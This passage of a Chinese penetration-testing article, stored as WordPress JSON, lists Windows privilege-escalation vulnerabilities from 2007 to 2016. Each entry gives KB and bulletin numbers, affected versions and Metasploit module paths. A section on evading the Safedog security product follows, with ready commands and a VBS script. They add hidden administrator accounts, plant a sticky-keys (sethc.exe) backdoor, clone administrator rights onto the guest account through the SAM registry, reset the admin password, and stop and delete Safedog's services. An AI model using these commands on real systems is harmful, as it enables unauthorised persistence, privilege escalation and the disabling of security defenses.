<li><span>exploit\/windows\/dcerpc\/ms07_065_msmq&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff083\uff09KB941568|MS07-064&nbsp;Win2000SP4&nbsp;&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>&nbsp;&nbsp;exploit\/windows\/misc\/ms07_064_sami&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff084\uff09KB944653|MS07-067&nbsp;WinXPSP2\u3001WinXP-x64-SP2\u3001Win2003SP1\/SP2&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>2. 2008\u5e74\u5bf9\u5e94\u6f0f\u6d1e\u3001\u7f16\u53f7\u53ca\u5176\u5f71\u54cd\u7cfb\u7edf\u53camsf\u6a21\u5757<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>\uff081\uff09KB958644&nbsp;|MS08-067&nbsp;Win2000SP4\u3001WinXP-SP2\/SP3\u3001&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>WinXP-64-SP\/SP2\u3001Win2003SP1\/SP2\u3001Win2003-64\/SP2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/smb\/ms08_067_netapi&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff082\uff09KB&nbsp;957097|&nbsp;MS08-068&nbsp;Win2000SP4\u3001WinXP-SP2\/SP3\u3001&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>WinXP-64-SP\/SP2\u3001Win2003SP1\/SP2\u3001Win2003-64\/SP2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/smb\/smb_relay&nbsp;&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>3. 2009\u5e74\u5bf9\u5e94\u6f0f\u6d1e\u3001\u7f16\u53f7\u53ca\u5176\u5f71\u54cd\u7cfb\u7edf\u53camsf\u6a21\u5757<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>\uff081\uff09KB952004|MS09-012&nbsp;PR&nbsp;Win2003\/2008&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>\uff082\uff09KB956572|MS09-012\u70e4\u8089&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff083\uff09KB970483|MS09-020&nbsp;IIS6&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff084\uff09KB971657|MS09-041&nbsp;WinXP\u3001Win2003\u63d0\u6743&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff085\uff09KB975254|MS09-053&nbsp;IIS5\u8fdc\u7a0b\u6ea2\u51fa\uff0cWindows2000SP4\uff0cWin2003\u53caWin2008\u62d2\u7edd\u670d\u52a1\u3002&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff086\uff09KB975517&nbsp;|MS09-050&nbsp;Vista\u3001Win2008-32\/SP2\u3001Win2008-64\/SP2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/smb\/ms09_050_smb2_negotiate_func_index&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>4. 2010\u5e74\u5bf9\u5e94\u6f0f\u6d1e\u3001\u7f16\u53f7\u53ca\u5176\u5f71\u54cd\u7cfb\u7edf\u53camsf\u6a21\u5757<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>\uff081\uff09KB977165|MS10-015&nbsp;Vista\u3001Win2003-32-64\/SP2\u3001Win2008-32-64\/SP2&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/local\/ms10_015_kitrap0d&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff082\uff09KB&nbsp;2347290|MS10-061&nbsp;Winxp3\u3001Winxp64sp2\u3001Win2003-32-64&nbsp;SP2\u3001Win2008-32-64&nbsp;SP2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff083\uff09KB2360937|MS10-084&nbsp;Winxp3\u3001Winxp64sp2\u3001Win2003-32-64&nbsp;SP2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff084\uff09KB2305420|&nbsp;MS10-092&nbsp;Win7-32-64\u3001Win2008-32-64\u3001Win2008R2-32-64&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/local\/ms10_092_schelevator&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff085\uff09KB2124261|KB2271195&nbsp;&nbsp;MS10-065&nbsp;IIS7&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>5. 2011\u5e74\u5bf9\u5e94\u6f0f\u6d1e\u3001\u7f16\u53f7\u53ca\u5176\u5f71\u54cd\u7cfb\u7edf\u53camsf\u6a21\u5757<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>\uff081\uff09KB2393802|MS11-011&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>Winxp32-64-SP3\u3001Win2003-32-64-SP2\u3001Win7-32-64-SP1\u3001&nbsp;Win2008-R2-64-SP2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff082\uff09KB2478960|MS11-014&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>Winxp32-64-SP3\u3001Win2003-32-64-SP2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff083\uff09KB2507938|MS11-056&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>Winxp32-64-SP3\u3001Win2003-32-64-SP2\u3001Win7-32-64-SP1\u3001&nbsp;Win2008-R2-64-SP2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff084\uff09KB2566454|MS11-062&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>Winxp32-64-SP3\u3001Win2003-32-64-SP2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff085\uff09KB2620712|MS11-097&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>Winxp-SP3\u3001Win2003-SP2\u3001Win7-64-SP1\u3001&nbsp;Win2008R2-64-SP1&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff086\uff09KB2503665|MS11-046&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>Winxp-SP3\u3001Win2003-SP2\u3001Win7-64-SP1\u3001&nbsp;Win2008R2-64-SP1&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff087\uff09KB2592799|MS11-080&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>Winxp-SP3\u3001Win2003-SP2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/local\/ms11_080_afdjoinleaf&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>6. 2012\u5e74\u5bf9\u5e94\u6f0f\u6d1e\u3001\u7f16\u53f7\u53ca\u5176\u5f71\u54cd\u7cfb\u7edf\u53camsf\u6a21\u5757<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>\uff081\uff09KB2711167|&nbsp;KB2707511|KB2709715|MS12-042&nbsp;&nbsp;sysret&nbsp;\u2013pid&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>Winxp-SP3\u3001Win2003-SP2\u3001Win7-64-SP1\u3001&nbsp;Win2008R2-64-SP1\u3001Win8-32-64\u3001Win2012&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff082\uff09KB2621440|MS12-020&nbsp;Winxp-SP3\u3001Win2003-SP2\u3001Win7-64-SP1\u3001&nbsp;Win2008R2-64-SP1\u3001&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>7. 2013\u5e74\u5bf9\u5e94\u6f0f\u6d1e\u3001\u7f16\u53f7\u53ca\u5176\u5f71\u54cd\u7cfb\u7edf\u53camsf\u6a21\u5757<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>\uff081\uff09KB2778930|MS13-005&nbsp;Vista-32-64-SP2\u3001Win2008-32-64-SP2\u3001Win7-32-64-SP1\u3001&nbsp;Win2008R2-64-SP1\u3001Win8-32-64\u3001Win2012&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/local\/ms13_005_hwnd_broadcast&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff082\uff09KB2840221|MS13-046&nbsp;WinXP-32-SP3\u3001WinXP-64-SP2\u3001Win2003-32-64-SP2\u3001Vista-32-64-SP2\u3001Win2008-R2-32-64-SP2\u3001Win7-32-64-SP1\u3001&nbsp;Win2008R2-64-SP1\u3001Win8-32-64\u3001Win2012\u3001Win2012R2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff083\uff09KB2850851|MS13-053&nbsp;EPATHOBJ&nbsp;0day\uff0cWinXP-32-SP3\u3001WinXP-64-SP2\u3001Win2003-32-64-SP2\u3001Vista-32-64-SP2\u3001Win2008-R2-32-64-SP2\u3001Win7-32-64-SP1\u3001&nbsp;Win2008R2-64-SP1\u3001Win8-32-64\u3001Win2012&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/local\/ms13_053_schlamperei&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>8. 2014\u5e74\u5bf9\u5e94\u6f0f\u6d1e\u3001\u7f16\u53f7\u53ca\u5176\u5f71\u54cd\u7cfb\u7edf\u53camsf\u6a21\u5757<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>\uff081\uff09KB&nbsp;2914368&nbsp;|MS14-002&nbsp;WinXPSP3\u3001WinXP-64-SP2\u3001Win2003-32-64-sp2&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/local\/ms_ndproxy&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff082\uff09KB&nbsp;2916607|MS14-009&nbsp;Win2003-32-64-SP2\u3001Vista-32-64-SP2\u3001Win2008-32-64-SP2\u3001Win7-R2-32-64-SP1\u3001&nbsp;Win2008R2-64-SP1\u3001Win8-8.1-32-64\u3001Win2012\u3001Win2012R2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/local\/ms14_009_ie_dfsvc&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff083\uff09KB3000061|MS14-058&nbsp;Win2003-32-64-SP2\u3001Vista-32-64-SP2\u3001Win2008-R2-32-64-SP2\u3001Win7-32-64-SP1\u3001&nbsp;Win2008R2-64-SP1\u3001Win8-8.1-32-64\u3001Win2012\u3001Win2012R2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/local\/ms14_058_track_popup_menu&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff084\uff09KB&nbsp;2989935|MS14-070&nbsp;Win2003-32-64-SP2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/local\/ms14_070_tcpip_ioctl&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>9. 2015\u5e74\u5bf9\u5e94\u6f0f\u6d1e\u3001\u7f16\u53f7\u53ca\u5176\u5f71\u54cd\u7cfb\u7edf\u53camsf\u6a21\u5757<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>\uff081\uff09KB3023266|MS15-001&nbsp;Win7-32-64-SP1\u3001Win2008R2-32-64-SP1\u3001&nbsp;Win2008R2-64-SP1\u3001Win8-8.1-32-64\u3001Win2012\u3001Win2012R2&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/local\/ntapphelpcachecontrol&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff082\uff09KB3025421|MS15_004\u3001Win7-32-64-SP1\u3001Win2008R2-32-64-SP1\u3001&nbsp;Win2008R2-64-SP1\u3001Win8-8.1-32-64\u3001Win2012\u3001Win2012R2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/local\/ms15_004_tswbproxy&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff083\uff09KB3041836|MS15-020\u3001Win2003-32-64-SP2\u3001Vista-32-64-SP2\u3001Win2008-32-64-SP2\u3001Win7-R2-32-64-SP1\u3001&nbsp;Win2008R2-64-SP1\u3001Win8-8.1-32-64\u3001Win2012\u3001Win2012R2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/smb\/ms15_020_shortcut_icon_dllloader&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff084\uff09KB3057191|MS15-051&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>Win2003-32-64-SP2\u3001Vista-32-64-SP2\u3001Win2008-32-64-SP2\u3001Win7-R2-32-64-SP1\u3001&nbsp;Win2008R2-64-SP1\u3001Win8-8.1-32-64\u3001Win2012\u3001Win2012R2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/local\/ms15_051_client_copy_image&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff085\uff09KB3077657|MS15-077&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>Win2003-32-64-SP2\u3001Vista-32-64-SP2\u3001Win2008-32-64-SP2\u3001Win7-R2-32-64-SP1\u3001&nbsp;Win2008R2-64-SP1\u3001Win8-8.1-32-64\u3001Win2012\u3001Win2012R2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff086\uff09KB&nbsp;3079904|MS15_078&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>Win2003-32-64-SP2\u3001Vista-32-64-SP2\u3001Win2008-32-64-SP2\u3001Win7-R2-32-64-SP1\u3001&nbsp;Win2008R2-64-SP1\u3001Win8-8.1-32-64\u3001Win2012\u3001Win2012R2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/local\/ms15_078_atmfd_bof&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff087\uff09KB3079904|MS15-097&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>Win2003-32-64-SP2\u3001Vista-32-64-SP2\u3001Win2008-32-64-SP2\u3001Win7-R2-32-64-SP1\u3001&nbsp;Win2008R2-64-SP1\u3001Win8-8.1-32-64\u3001Win2012\u3001Win2012R2&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/smb\/ms15_020_shortcut_icon_dllloader&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>10. 2016\u5e74\u5bf9\u5e94\u6f0f\u6d1e\u3001\u7f16\u53f7\u53ca\u5176\u5f71\u54cd\u7cfb\u7edf\u53camsf\u6a21\u5757<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>\uff081\uff09KB3134228|MS16-014&nbsp;Win2008\u3001Win7\u3001Win2012&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>\uff082\uff09KB3124280|MS16-016&nbsp;WebDAV\u63d0\u6743\u6f0f\u6d1e\uff0cVista-32-64-SP2\u3001Win2008-32-64-SP2\u3001Win7-32-64-SP1\u3001Win2008R2-64-SP1\u3001Win8.1-32-64\u3001Win2012\u3001Win2012R2\u3001Win10-32-64&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/local\/ms16_016_webdav&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>\uff083\uff09KB3139914|MS16-032\u3001Vista-32-64-SP2\u3001Win2008-32-64-SP2\u3001Win7-32-64-SP1\u3001Win2008R2-64-SP1\u3001Win8.1-32-64\u3001Win2012\u3001Win2012R2\u3001Win10-32-64&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>exploit\/windows\/local\/ms16_032_secondary_logon_handle_privesc&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>Windows&nbsp;2003&nbsp;SP2&nbsp;\u5b89\u88c5\u4e86MS10-046\u8865\u4e01\uff0c\u53ef\u7528ms15_020\u8fdb\u884c\u6ea2\u51fa&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>Windows&nbsp;2008&nbsp;SP2&nbsp;(32&nbsp;bits)\u5b89\u88c5\u4e86MS14-027\u8865\u4e01\u53ef\u7528ms15_020\u8fdb\u884c\u6ea2\u51fa&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p><strong>\u4e03\u3001\u8fc7\u5b89\u5168\u72d7<\/strong><\/p>\n<p>1. vbs\u6cd5<\/p>\n<p>\u5c06\u4ee5\u4e0b\u4ee3\u7801\u4fdd\u5b58\u4e3a1.vbs\u7136\u540e\u6267\u884ccscript 1.vbs<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>Set&nbsp;<\/span><span>o<\/span><span>=<\/span><span>CreateObject<\/span><span>(&nbsp;\"Shell.Users\"&nbsp;)&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>Set&nbsp;<span>z<\/span><span>=<\/span><span>o<\/span><span>.create(\"user\")&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>z.changePassword&nbsp;\"1qaz2WSX12\",\"\"&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>z.setting(\"AccountType\")=3&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>2. shift\u540e\u95e8\u6cd5<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>copy&nbsp;C:\\sethc.exe&nbsp;C:\\windows\\system32\\sethc.exe&nbsp;&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>copy&nbsp;C:\\windows\\system32\\sethc.exe&nbsp;C:\\windows\\system32\\dllcache\\sethc.exe&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>3. for\u5faa\u73af\u6dfb\u52a0\u5e10\u53f7\u6cd5<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>for&nbsp;\/l&nbsp;%%i&nbsp;in&nbsp;(1,1,100)&nbsp;do&nbsp;@net&nbsp;user&nbsp;temp&nbsp;asphxg&nbsp;\/add&amp;@net&nbsp;localgroup&nbsp;administrators&nbsp;temp&nbsp;\/add&nbsp;<\/span><\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>4. \u4fee\u6539\u6ce8\u518c\u8868\u6cd5<\/p>\n<p>administrator\u5bf9\u5e94\u503c\u662f1F4,GUEST\u662f1F5\u3002<\/p>\n<p>(1)\u4f7f\u7528net1 user guset 1 ,\u5c06guest\u5bc6\u7801\u91cd\u7f6e\u4e3a1\uff0c\u65e0\u9700\u8fc7\u95ee\u662fguest\u5426\u7981\u7528<\/p>\n<p>(2)\u6267\u884c\uff1areg export \"HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000001F4\" \"C:\\RECYCLER\\1.reg\"<\/p>\n<p>\u5bfc\u51faadministrator\u7684\u6ce8\u518c\u8868\u503c\u5230\u67d0\u8def\u5f84,\u4fee\u6539\u5185\u5bb9\uff0c\u5c06\"V\"\u503c\u5220\u9664\uff0c\u53ea\u7559F\u503c,\u5c061F4\u4fee\u6539\u4e3a1F5,\u4fdd\u5b58\u3002<\/p>\n<p>(3)\u6267\u884cregedit \/s C:\\RECYCLER\\1.reg \u5bfc\u5165\u6ce8\u518c\u8868<\/p>\n<p>\u5c31\u53ef\u4ee5\u4f7f\u7528\uff0cguest \u5bc6\u78011\u767b\u9646\u4e86\u3002<\/p>\n<p>5. \u76f4\u63a5\u4fee\u6539\u7ba1\u7406\u5458\u5bc6\u7801\u6cd5\uff0c\u5c3d\u91cf\u4e0d\u7528\u8fd9\u62db\uff0c\u5b9e\u5728\u6ca1\u6709\u529e\u6cd5\u5c31\u7528\u8fd9\u4e2a\u3002<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>net&nbsp;user&nbsp;administrator&nbsp;somepwd&nbsp;<\/span><\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>6. \u5220\u9664\u4e0e\u505c\u6b62\u5b89\u5168\u72d7\u76f8\u5173\u670d\u52a1\u6cd5<\/p>\n<p>\u5982\u679c\u662fsystem\u6743\u9650\u53ef\u4ee5\u91c7\u53d6\u4ee5\u4e0b\u65b9\u6cd5\u505c\u6b62\u5b89\u5168\u72d7<\/p>\n<p>(1)\u505c\u6b62\u5b89\u5168\u72d7\u76f8\u5173\u670d\u52a1<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>net&nbsp;stop&nbsp;&nbsp;&nbsp;&nbsp;\"Safedog&nbsp;Guard&nbsp;Center\"&nbsp;&nbsp;\/y&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>net&nbsp;stop&nbsp;&nbsp;&nbsp;&nbsp;\"Safedog&nbsp;Update&nbsp;Center\"&nbsp;\/y&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>net&nbsp;stop&nbsp;&nbsp;&nbsp;&nbsp;\"SafeDogCloudHelper\"&nbsp;&nbsp;\/y&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>(2)\u76f4\u63a5\u5220\u9664SafeDogGuardCenter\u670d\u52a1<\/p>\n<pre>\n \n \n \n <ol>\n  \n  \n  \n  <li><span><span>sc&nbsp;stop&nbsp;\"SafeDogGuardCenter\"&nbsp;&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>sc&nbsp;config&nbsp;\"SafeDogGuardCenter\"&nbsp;<span>start<\/span><span>=&nbsp;<\/span><span>disabled<\/span><span>&nbsp;&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>sc&nbsp;delete&nbsp;\"SafeDogGuardCenter\"&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>sc&nbsp;stop&nbsp;\"&nbsp;SafeDogUpdateCenter\"&nbsp;&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>sc&nbsp;config&nbsp;\"&nbsp;SafeDogUpdateCenter\"&nbsp;<span>start<\/span><span>=&nbsp;<\/span><span>disabled<\/span><span>&nbsp;&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>sc&nbsp;delete&nbsp;\"&nbsp;SafeDogUpdateCenter\"&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>sc&nbsp;stop&nbsp;\"&nbsp;SafeDogCloudHelper\"&nbsp;&nbsp;<\/span><\/li>\n  \n  \n  \n  <li><span>sc&nbsp;config&nbsp;\"&nbsp;SafeDogCloudHelper\"&nbsp;<span>start<\/span><span>=&nbsp;<\/span><span>disabled<\/span><span>&nbsp;&nbsp;<\/span><\/span><\/li>\n  \n  \n  \n  <li><span>sc&nbsp;delete&nbsp;\"&nbsp;SafeDogCloudHelper\"&nbsp;<\/span><\/li>\n \n \n \n <\/ol><\/pre>\n<p>\u3010\u539f\u521b\u7a3f\u4ef6\uff0c\u5408\u4f5c\u7ad9\u70b9\u8f6c\u8f7d\u8bf7\u6ce8\u660e\u539f\u6587\u4f5c\u8005\u548c\u51fa\u5904\u4e3a.com\u3011<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u3010\u3011\u5728\u6e17\u900f\u8fc7\u7a0b\u4e2d\u5f88\u591a\u4eba\u90fd\u8ba4\u4e3aWindows\u63d0\u6743\u5f88\u96be\uff0c\u5176\u6838\u5fc3\u662f\u638c\u63e1\u7684\u57fa\u7840\u4e0d\u591f\u624e\u5b9e\uff0c\u5f53\u7136\u9664\u4e86\u6781\u4e3a\u53d8\u6001\u7684\u6743\u9650\u8bbe\u7f6e\u7684\u670d [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":283367,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[202645],"tags":[],"class_list":["post-283366","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-202645"],"_links":{"self":[{"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/posts\/283366","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/comments?post=283366"}],"version-history":[{"count":0,"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/posts\/283366\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/media\/283367"}],"wp:attachment":[{"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/media?parent=283366"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/categories?post=283366"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/tags?post=283366"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}